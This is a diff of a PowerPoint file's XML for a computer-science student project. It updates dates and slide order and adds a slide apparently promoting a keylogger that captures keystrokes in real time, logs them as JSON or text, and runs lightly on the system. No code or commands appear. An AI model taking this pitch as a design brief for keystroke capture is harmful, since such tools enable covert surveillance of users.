--- a/Cs-Project.pptx
+++ b/Cs-Project.pptx
@@ -8,13 +8,19 @@
     <p:sldId id="256" r:id="rId2"/>
     <p:sldId id="257" r:id="rId3"/>
     <p:sldId id="258" r:id="rId4"/>
-    <p:sldId id="259" r:id="rId5"/>
-    <p:sldId id="260" r:id="rId6"/>
-    <p:sldId id="261" r:id="rId7"/>
-    <p:sldId id="262" r:id="rId8"/>
-    <p:sldId id="263" r:id="rId9"/>
-    <p:sldId id="264" r:id="rId10"/>
-    <p:sldId id="265" r:id="rId11"/>
+    <p:sldId id="266" r:id="rId5"/>
+    <p:sldId id="267" r:id="rId6"/>
+    <p:sldId id="259" r:id="rId7"/>
+    <p:sldId id="268" r:id="rId8"/>
+    <p:sldId id="260" r:id="rId9"/>
+    <p:sldId id="261" r:id="rId10"/>
+    <p:sldId id="262" r:id="rId11"/>
+    <p:sldId id="263" r:id="rId12"/>
+    <p:sldId id="264" r:id="rId13"/>
+    <p:sldId id="269" r:id="rId14"/>
+    <p:sldId id="265" r:id="rId15"/>
+    <p:sldId id="270" r:id="rId16"/>
+    <p:sldId id="272" r:id="rId17"/>
   </p:sldIdLst>
   <p:sldSz cx="12192000" cy="6858000"/>
   <p:notesSz cx="12192000" cy="6858000"/>
@@ -277,7 +283,7 @@
           <a:p>
             <a:fld id="{1D8BD707-D9CF-40AE-B4C6-C98DA3205C09}" type="datetimeFigureOut">
               <a:rPr lang="en-US"/>
-              <a:t>6/6/2024</a:t>
+              <a:t>6/18/2024</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -457,7 +463,7 @@
           <a:p>
             <a:fld id="{1D8BD707-D9CF-40AE-B4C6-C98DA3205C09}" type="datetimeFigureOut">
               <a:rPr lang="en-US"/>
-              <a:t>6/6/2024</a:t>
+              <a:t>6/18/2024</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -680,7 +686,7 @@
           <a:p>
             <a:fld id="{1D8BD707-D9CF-40AE-B4C6-C98DA3205C09}" type="datetimeFigureOut">
               <a:rPr lang="en-US"/>
-              <a:t>6/6/2024</a:t>
+              <a:t>6/18/2024</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -837,7 +843,7 @@
           <a:p>
             <a:fld id="{1D8BD707-D9CF-40AE-B4C6-C98DA3205C09}" type="datetimeFigureOut">
               <a:rPr lang="en-US"/>
-              <a:t>6/6/2024</a:t>
+              <a:t>6/18/2024</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -965,7 +971,7 @@
           <a:p>
             <a:fld id="{1D8BD707-D9CF-40AE-B4C6-C98DA3205C09}" type="datetimeFigureOut">
               <a:rPr lang="en-US"/>
-              <a:t>6/6/2024</a:t>
+              <a:t>6/18/2024</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -1684,7 +1690,7 @@
           <a:p>
             <a:fld id="{1D8BD707-D9CF-40AE-B4C6-C98DA3205C09}" type="datetimeFigureOut">
               <a:rPr lang="en-US"/>
-              <a:t>6/6/2024</a:t>
+              <a:t>6/18/2024</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -2281,182 +2287,6 @@
       </p:pic>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="10" name="object 10"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="739775" y="6473337"/>
-            <a:ext cx="1798955" cy="191770"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="6985" rIns="0" bIns="0" rtlCol="0">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="12700">
-              <a:lnSpc>
-                <a:spcPct val="100000"/>
-              </a:lnSpc>
-              <a:spcBef>
-                <a:spcPts val="55"/>
-              </a:spcBef>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1100" spc="20" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>3/21/202</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" spc="10" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>4</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" spc="130" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" spc="50" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>A</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" spc="15" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>nnu</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" spc="10" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>al</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" spc="-140" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>R</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" spc="35" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>e</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" spc="90" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>v</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" spc="-35" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>i</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" spc="35" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>e</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" spc="15" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>w</a:t>
-            </a:r>
-            <a:endParaRPr sz="1100">
-              <a:latin typeface="Trebuchet MS"/>
-              <a:cs typeface="Trebuchet MS"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
           <p:cNvPr id="11" name="object 11"/>
           <p:cNvSpPr txBox="1">
             <a:spLocks noGrp="1"/>
@@ -2501,6 +2331,523 @@
 </file>
 
 <file path=ppt/slides/slide10.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="2" name="object 2"/>
+          <p:cNvPicPr/>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId2" cstate="print"/>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="0" y="1476375"/>
+            <a:ext cx="2695574" cy="3248025"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="6" name="object 6"/>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="558165" y="857885"/>
+            <a:ext cx="9763125" cy="575310"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="13335" rIns="0" bIns="0" rtlCol="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="12700">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="105"/>
+              </a:spcBef>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="3600" spc="-40" dirty="0"/>
+              <a:t>Y</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="3600" spc="10" dirty="0"/>
+              <a:t>O</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="3600" spc="25" dirty="0"/>
+              <a:t>U</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="3600" dirty="0"/>
+              <a:t>R</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="3600" spc="5" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="3600" spc="25" dirty="0"/>
+              <a:t>S</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="3600" spc="10" dirty="0"/>
+              <a:t>O</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="3600" spc="25" dirty="0"/>
+              <a:t>LU</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="3600" spc="-35" dirty="0"/>
+              <a:t>T</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="3600" spc="-30" dirty="0"/>
+              <a:t>I</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="3600" spc="10" dirty="0"/>
+              <a:t>O</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="3600" dirty="0"/>
+              <a:t>N</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="3600" spc="-345" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="3600" spc="-35" dirty="0"/>
+              <a:t>A</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="3600" spc="-5" dirty="0"/>
+              <a:t>N</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="3600" dirty="0"/>
+              <a:t>D</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="3600" spc="35" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="3600" spc="-30" dirty="0"/>
+              <a:t>I</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="3600" spc="-35" dirty="0"/>
+              <a:t>T</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="3600" dirty="0"/>
+              <a:t>S</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="3600" spc="60" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="3600" spc="-295" dirty="0"/>
+              <a:t>V</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="3600" spc="-35" dirty="0"/>
+              <a:t>A</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="3600" spc="25" dirty="0"/>
+              <a:t>LU</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="3600" dirty="0"/>
+              <a:t>E</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="3600" spc="-65" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="3600" spc="-15" dirty="0"/>
+              <a:t>P</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="3600" spc="-30" dirty="0"/>
+              <a:t>R</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="3600" spc="10" dirty="0"/>
+              <a:t>O</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="3600" spc="-15" dirty="0"/>
+              <a:t>P</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="3600" spc="10" dirty="0"/>
+              <a:t>O</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="3600" spc="25" dirty="0"/>
+              <a:t>S</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="3600" spc="-30" dirty="0"/>
+              <a:t>I</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="3600" spc="-35" dirty="0"/>
+              <a:t>T</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="3600" spc="-30" dirty="0"/>
+              <a:t>I</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="3600" spc="10" dirty="0"/>
+              <a:t>O</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="3600" dirty="0"/>
+              <a:t>N</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="7" name="object 7"/>
+          <p:cNvPicPr/>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId3" cstate="print"/>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="676275" y="6467475"/>
+            <a:ext cx="2143125" cy="200025"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="9" name="object 9"/>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="7"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="6985" rIns="0" bIns="0" rtlCol="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="38100">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="55"/>
+              </a:spcBef>
+            </a:pPr>
+            <a:fld id="{81D60167-4931-47E6-BA6A-407CBD079E47}" type="slidenum">
+              <a:rPr spc="10" dirty="0"/>
+              <a:t>10</a:t>
+            </a:fld>
+            <a:endParaRPr spc="10" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="10" name="TextBox 9">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A2F1630-803C-10D0-DEC2-D430755F9C30}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="2819400" y="1676400"/>
+            <a:ext cx="7010400" cy="5078313"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" rtlCol="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" b="1" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Key Features</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:buFont typeface="+mj-lt"/>
+              <a:buAutoNum type="arabicPeriod"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" b="1" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Simplicity</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0">
+              <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="742950" lvl="1" indent="-285750">
+              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+              <a:buChar char="Ø"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" b="1" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Easy Setup and Use</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>: Designed for easy installation and operation, even for non-technical users.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:buFont typeface="+mj-lt"/>
+              <a:buAutoNum type="arabicPeriod"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" b="1" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Real-time Logging</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0">
+              <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="742950" lvl="1" indent="-285750">
+              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+              <a:buChar char="Ø"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" b="1" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Immediate Insights</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>: Captures and logs keystrokes in real-time for prompt data analysis.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:buFont typeface="+mj-lt"/>
+              <a:buAutoNum type="arabicPeriod"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" b="1" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Comprehensive Logs</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0">
+              <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="742950" lvl="1" indent="-285750">
+              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+              <a:buChar char="Ø"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" b="1" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Detailed Analysis</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>: Supports both JSON and text formats, providing detailed and flexible log outputs.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:buFont typeface="+mj-lt"/>
+              <a:buAutoNum type="arabicPeriod"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" b="1" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>User-Friendly Interface</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0">
+              <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="742950" lvl="1" indent="-285750">
+              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+              <a:buChar char="Ø"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" b="1" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Intuitive GUI</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>: Built with </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Tkinter</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>, the interface is designed to be simple and easy to navigate.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" b="1" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Advantages</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:buFont typeface="+mj-lt"/>
+              <a:buAutoNum type="arabicPeriod"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" b="1" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Efficiency</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0">
+              <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="742950" lvl="1" indent="-285750">
+              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+              <a:buChar char="Ø"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" b="1" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Lightweight Performance</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>: Operates without significantly impacting system performance.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" dirty="0">
+              <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide11.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -2690,156 +3037,1766 @@
           </a:p>
         </p:txBody>
       </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="6" name="object 6"/>
+          <p:cNvPicPr/>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId2" cstate="print"/>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="66675" y="3381373"/>
+            <a:ext cx="2466975" cy="3419475"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="3" name="object 3"/>
-          <p:cNvSpPr/>
+          <p:cNvPr id="7" name="object 7"/>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="739775" y="654938"/>
+            <a:ext cx="7543165" cy="678180"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16510" rIns="0" bIns="0" rtlCol="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="12700">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="130"/>
+              </a:spcBef>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="4250" spc="15" dirty="0"/>
+              <a:t>THE</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="4250" spc="20" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="4250" spc="10" dirty="0"/>
+              <a:t>WOW</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="4250" spc="85" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="4250" spc="10" dirty="0"/>
+              <a:t>IN</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="4250" spc="-5" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="4250" spc="15" dirty="0"/>
+              <a:t>YOUR</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="4250" spc="-10" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="4250" spc="20" dirty="0"/>
+              <a:t>SOLUTION</a:t>
+            </a:r>
+            <a:endParaRPr sz="4250" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="8" name="object 8"/>
+          <p:cNvSpPr txBox="1"/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="9353550" y="5362575"/>
-            <a:ext cx="457200" cy="457200"/>
+            <a:off x="11277218" y="6473337"/>
+            <a:ext cx="228600" cy="191770"/>
           </a:xfrm>
-          <a:custGeom>
+          <a:prstGeom prst="rect">
             <a:avLst/>
-            <a:gdLst/>
-            <a:ahLst/>
-            <a:cxnLst/>
-            <a:rect l="l" t="t" r="r" b="b"/>
-            <a:pathLst>
-              <a:path w="457200" h="457200">
